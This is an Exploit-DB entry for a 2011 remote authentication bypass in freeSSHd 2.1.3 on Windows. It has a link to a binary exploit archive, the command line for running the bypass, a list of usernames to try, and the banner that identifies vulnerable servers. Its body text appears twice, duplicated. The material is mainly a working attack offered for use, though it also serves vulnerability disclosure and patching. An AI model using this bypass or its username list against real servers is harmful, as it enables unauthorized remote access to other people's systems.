freeSSHd 2.1.3 - Remote Authentication Bypass

EDB-ID:

23080


Author:

kingcope

Type:

remote


Platform:

Windows

Date:

2012-12-02


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

FreeSSHD all version Remote Authentication Bypass ZERODAY
Discovered & Exploited by Kingcope
Year 2011

# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23080.zip

Run like:

ssh.exe -l<valid username> <host>

valid username might be:

root
admin
administrator
webadmin
sysadmin
netadmin
guest
user
web
test
ssh
sftp
ftp

or anything you can imagine.


The vulnerable banner of the most recent version is:

SSH-2.0-WeOnlyDo 2.1.3


For your pleasure,

KingcopeFreeSSHD all version Remote Authentication Bypass ZERODAY
Discovered & Exploited by Kingcope
Year 2011

Run like:

ssh.exe -l<valid username> <host>

valid username might be:

root
admin
administrator
webadmin
sysadmin
netadmin
guest
user
web
test
ssh
sftp
ftp

or anything you can imagine.


The vulnerable banner of the most recent version is:

SSH-2.0-WeOnlyDo 2.1.3


For your pleasure,

Kingcope